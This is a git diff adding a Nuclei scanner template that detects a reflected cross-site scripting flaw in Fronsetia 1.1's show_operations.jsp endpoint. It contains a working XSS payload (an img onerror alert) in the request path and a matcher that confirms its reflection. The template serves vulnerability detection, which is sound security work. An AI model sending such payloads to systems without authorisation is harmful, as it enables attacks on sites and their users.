projectdiscovery · Kazgangap · Nov 28, 2024
diff --git a/http/vulnerabilities/fronsetiav-xss.yaml b/http/vulnerabilities/fronsetiav-xss.yaml
@@ -0,0 +1,28 @@
+id: fronsetiav-xss
+
+info:
+  name: fronsetiav1.1 - Cross-Site Scripting
+  author: s4e-io
+  severity: high
+  description: |
+    The fronsetiav1.1 application is vulnerable to a Reflected XSS attack through the show_operations.jsp endpoint. An attacker can inject malicious scripts via the WSDL Location input, which is executed in the victim's browser due to improper input sanitization. This allows attackers to execute arbitrary JavaScript, potentially stealing sensitive data or performing phishing attacks..
+  reference:
+    - https://seclists.org/fulldisclosure/2024/Nov/10
+    - https://packetstormsecurity.com/files/182764/fronsetia-1.1-Cross-Site-Scripting.html
+    - https://msecureltd.blogspot.com/2024/11/friday-fun-pentest-series-14-reflected.html
+  metadata:
+    vendor: fronsetiav1.1
+    product: fronsetiav1.1
+  tags: xss,fronsetiav1,seclists,packetstorm
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/show_operations.jsp?Fronsetia_WSDL=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(body, "<title> Fronsetia: \"><img src=x onerror=alert(document.domain)> </title>")'
+          - 'status_code == 200'
+        condition: and